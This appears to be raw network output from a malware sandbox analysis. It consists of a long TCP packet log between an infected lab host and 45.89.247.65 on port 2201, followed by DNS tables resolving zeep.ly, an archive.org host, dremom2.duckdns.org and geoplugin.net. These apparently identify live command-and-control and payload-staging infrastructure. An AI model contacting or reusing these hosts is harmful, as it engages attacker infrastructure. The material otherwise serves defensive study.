                                        Sep 9, 2024 17:35:47.364777088 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:47.364804983 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:47.364836931 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:47.364866018 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:47.364892960 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:47.364918947 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:47.364945889 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:47.364996910 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:47.365024090 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:47.365058899 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:47.365087032 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:47.365113974 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:47.368472099 CEST491772201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:35:47.371017933 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:47.371196032 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:47.371287107 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:47.371315002 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:47.371341944 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:47.371367931 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:47.371417046 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:47.371443987 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:47.375587940 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:47.375924110 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:47.376811981 CEST491772201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:35:47.378184080 CEST491772201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:35:47.381875992 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:47.381906986 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:47.381925106 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:47.382051945 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:47.382206917 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:47.382236004 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:47.385293961 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:47.505475044 CEST491752201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:35:47.510731936 CEST22014917545.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:47.624733925 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:47.687028885 CEST22014917645.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:47.864012003 CEST491772201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:35:47.957619905 CEST491762201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:35:48.116838932 CEST22014917645.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:48.116925955 CEST491762201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:35:48.293157101 CEST491762201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:35:48.294254065 CEST491762201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:35:48.300252914 CEST22014917645.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:48.300394058 CEST22014917645.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:48.300426006 CEST22014917645.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:48.300453901 CEST22014917645.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:48.300484896 CEST22014917645.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:48.300512075 CEST22014917645.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:48.300539017 CEST22014917645.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:51.902765989 CEST22014917645.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:51.902792931 CEST22014917645.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:51.902822018 CEST22014917645.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:51.902848005 CEST22014917645.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:51.902895927 CEST22014917645.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:51.903011084 CEST22014917645.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:51.903038025 CEST22014917645.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:51.903064013 CEST22014917645.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:51.920747995 CEST491762201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:35:51.926255941 CEST22014917645.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:51.926422119 CEST22014917645.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:51.926450968 CEST22014917645.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:51.926548958 CEST22014917645.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:52.047086954 CEST491772201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:35:52.049267054 CEST491772201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:35:52.054009914 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:52.054075956 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:52.054414988 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:52.054444075 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:52.055491924 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:52.055542946 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:52.055571079 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:52.055620909 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:52.055704117 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:52.055754900 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:52.057668924 CEST491772201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:35:52.060667992 CEST491772201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:35:52.062850952 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:52.062982082 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:52.063081980 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:52.063293934 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:52.063322067 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:52.065329075 CEST491772201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:35:52.065820932 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:52.065917015 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:52.070352077 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:52.070506096 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:52.070535898 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:52.070564032 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:52.364083052 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:52.528647900 CEST491752201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:35:52.533674002 CEST22014917545.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:52.554749966 CEST491772201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:35:52.556941986 CEST491772201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:35:52.560954094 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:52.561022043 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:52.561031103 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:52.561037064 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:52.561155081 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:52.561165094 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:52.561175108 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:52.561182976 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:52.561192036 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:52.561199903 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:52.561292887 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:52.561301947 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:52.561310053 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:52.561317921 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:52.561934948 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:52.564532042 CEST491772201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:35:52.566679955 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:52.566703081 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:52.566711903 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:52.566720963 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:52.566730976 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:52.566806078 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:52.569078922 CEST491772201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:35:52.570557117 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:52.570569038 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:52.572592020 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:52.572602034 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:52.572612047 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:52.572619915 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:52.574110031 CEST491772201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:35:52.574774027 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:52.574937105 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:52.574947119 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:52.574958086 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:52.576148033 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:52.576157093 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:52.576718092 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:52.580075979 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:52.580085993 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:52.580194950 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:52.712104082 CEST22014917645.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:52.740874052 CEST491762201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:35:52.742250919 CEST491762201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:35:52.745969057 CEST22014917645.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:52.746056080 CEST22014917645.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:52.746088028 CEST22014917645.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:52.746117115 CEST22014917645.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:52.746170998 CEST22014917645.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:52.746223927 CEST22014917645.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:52.746252060 CEST22014917645.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:52.746278048 CEST22014917645.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:52.746328115 CEST22014917645.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:52.746356010 CEST22014917645.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:52.746381998 CEST22014917645.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:52.746432066 CEST22014917645.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:52.746458054 CEST22014917645.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:52.746484995 CEST22014917645.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:52.747208118 CEST22014917645.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:52.747291088 CEST22014917645.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:52.748398066 CEST22014917645.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:52.798998117 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:52.967731953 CEST491772201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:35:52.970232010 CEST491772201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:35:52.973912954 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:52.974066973 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:52.974641085 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:52.975975990 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:52.976041079 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:52.976100922 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:52.976130962 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:52.976159096 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:52.976207018 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:52.976828098 CEST491772201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:35:52.982270956 CEST491772201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:35:52.982667923 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:52.982821941 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:52.983130932 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:52.983158112 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:52.984370947 CEST491772201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:35:52.987267017 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:52.987426996 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:52.987436056 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:52.987443924 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:52.987453938 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:52.987495899 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:52.987503052 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:52.989336967 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:52.989448071 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:52.989500046 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:53.385277033 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:53.491988897 CEST491752201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:35:53.497037888 CEST22014917545.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:53.522510052 CEST491772201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:35:53.524530888 CEST491772201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:35:53.534224033 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:53.534327030 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:53.534356117 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:53.534383059 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:53.534432888 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:53.534461021 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:53.534487009 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:53.534539938 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:53.534567118 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:53.534593105 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:53.534620047 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:53.534672976 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:53.534699917 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:53.534725904 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:53.536780119 CEST491772201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:35:53.541337013 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:53.541349888 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:53.541358948 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:53.541368961 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:53.542171001 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:53.542180061 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:53.542248964 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:53.542489052 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:53.542562008 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:53.542634964 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:53.543596029 CEST491772201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:35:53.544856071 CEST491772201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:35:53.549556971 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:53.549901962 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:53.549911976 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:53.550241947 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:53.550251961 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:53.550360918 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:53.550570965 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:53.550580025 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:53.550662041 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:53.551238060 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:53.551250935 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:53.667175055 CEST22014917645.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:53.696167946 CEST491762201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:35:53.697648048 CEST491762201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:35:53.701205015 CEST22014917645.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:53.701267004 CEST22014917645.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:53.701311111 CEST22014917645.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:53.701320887 CEST22014917645.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:53.701354980 CEST22014917645.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:53.701364040 CEST22014917645.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:53.701468945 CEST22014917645.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:53.701478004 CEST22014917645.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:53.701486111 CEST22014917645.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:53.701565981 CEST22014917645.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:53.701575041 CEST22014917645.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:53.701582909 CEST22014917645.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:53.701932907 CEST22014917645.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:53.701942921 CEST22014917645.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:53.702687025 CEST22014917645.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:53.702697039 CEST22014917645.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:53.702806950 CEST22014917645.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:54.200875044 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:54.319855928 CEST491772201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:35:54.321480989 CEST491772201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:35:54.385431051 CEST491752201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:35:54.429002047 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:54.431472063 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:54.431699991 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:54.431766987 CEST491772201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:35:54.432243109 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:54.432466030 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:54.432636023 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:54.432811022 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:54.432923079 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:54.433123112 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:54.433132887 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:54.433207035 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:54.433515072 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:54.433610916 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:54.433803082 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:54.433813095 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:54.433928013 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:54.434009075 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:54.434204102 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:54.434658051 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:54.434778929 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:54.434926033 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:54.435060978 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:54.435070038 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:54.435095072 CEST22014917545.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:54.440660000 CEST491772201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:35:54.442816973 CEST491772201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:35:54.445576906 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:54.445628881 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:54.445677042 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:54.445687056 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:54.445765972 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:54.445800066 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:54.445853949 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:54.447768927 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:54.447912931 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:54.448020935 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:54.449131012 CEST491772201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:35:54.453998089 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:54.454566002 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:54.464576960 CEST22014917545.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:54.464947939 CEST491752201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:35:54.467339039 CEST22014917645.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:54.467403889 CEST491762201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:35:54.467447042 CEST491762201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:35:54.472281933 CEST22014917645.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:54.663018942 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:54.780564070 CEST491772201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:35:54.782227039 CEST491772201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:35:54.785729885 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:54.785841942 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:54.787220955 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:54.787333012 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:54.787564039 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:54.787616014 CEST22014917745.89.247.65192.168.2.22
                                        Sep 9, 2024 17:35:54.787663937 CEST22014917745.89.247.65192.168.2.22
                                        | Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS |
                                        |---|---|---|---|---|---|---|---|---|
                                        | Sep 9, 2024 17:34:23.285903931 CEST | 192.168.2.22 | 8.8.8.8 | 0x7334 | Standard query (0) | zeep.ly | A (IP address) | IN (0x0001) | false |
                                        | Sep 9, 2024 17:34:24.239650011 CEST | 192.168.2.22 | 8.8.8.8 | 0xa3da | Standard query (0) | zeep.ly | A (IP address) | IN (0x0001) | false |
                                        | Sep 9, 2024 17:34:24.248281002 CEST | 192.168.2.22 | 8.8.8.8 | 0x9636 | Standard query (0) | zeep.ly | A (IP address) | IN (0x0001) | false |
                                        | Sep 9, 2024 17:34:29.208755970 CEST | 192.168.2.22 | 8.8.8.8 | 0xc083 | Standard query (0) | zeep.ly | A (IP address) | IN (0x0001) | false |
                                        | Sep 9, 2024 17:34:29.216810942 CEST | 192.168.2.22 | 8.8.8.8 | 0x1100 | Standard query (0) | zeep.ly | A (IP address) | IN (0x0001) | false |
                                        | Sep 9, 2024 17:34:38.493577957 CEST | 192.168.2.22 | 8.8.8.8 | 0x71ee | Standard query (0) | ia601706.us.archive.org | A (IP address) | IN (0x0001) | false |
                                        | Sep 9, 2024 17:34:42.622163057 CEST | 192.168.2.22 | 8.8.8.8 | 0x1140 | Standard query (0) | dremom2.duckdns.org | A (IP address) | IN (0x0001) | false |
                                        | Sep 9, 2024 17:34:44.311072111 CEST | 192.168.2.22 | 8.8.8.8 | 0x208b | Standard query (0) | geoplugin.net | A (IP address) | IN (0x0001) | false |
                                        | Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS |
                                        |---|---|---|---|---|---|---|---|---|---|---|
                                        | Sep 9, 2024 17:34:23.301367998 CEST | 8.8.8.8 | 192.168.2.22 | 0x7334 | No error (0) | zeep.ly | | 95.217.202.210 | A (IP address) | IN (0x0001) | false |
                                        | Sep 9, 2024 17:34:24.246395111 CEST | 8.8.8.8 | 192.168.2.22 | 0xa3da | No error (0) | zeep.ly | | 95.217.202.210 | A (IP address) | IN (0x0001) | false |
                                        | Sep 9, 2024 17:34:24.288400888 CEST | 8.8.8.8 | 192.168.2.22 | 0x9636 | No error (0) | zeep.ly | | 95.217.202.210 | A (IP address) | IN (0x0001) | false |
                                        | Sep 9, 2024 17:34:29.215455055 CEST | 8.8.8.8 | 192.168.2.22 | 0xc083 | No error (0) | zeep.ly | | 95.217.202.210 | A (IP address) | IN (0x0001) | false |
                                        | Sep 9, 2024 17:34:29.224106073 CEST | 8.8.8.8 | 192.168.2.22 | 0x1100 | No error (0) | zeep.ly | | 95.217.202.210 | A (IP address) | IN (0x0001) | false |
                                        | Sep 9, 2024 17:34:38.505302906 CEST | 8.8.8.8 | 192.168.2.22 | 0x71ee | No error (0) | ia601706.us.archive.org | | 207.241.227.96 | A (IP address) | IN (0x0001) | false |
                                        | Sep 9, 2024 17:34:42.719347000 CEST | 8.8.8.8 | 192.168.2.22 | 0x1140 | No error (0) | dremom2.duckdns.org | | 45.89.247.65 | A (IP address) | IN (0x0001) | false |
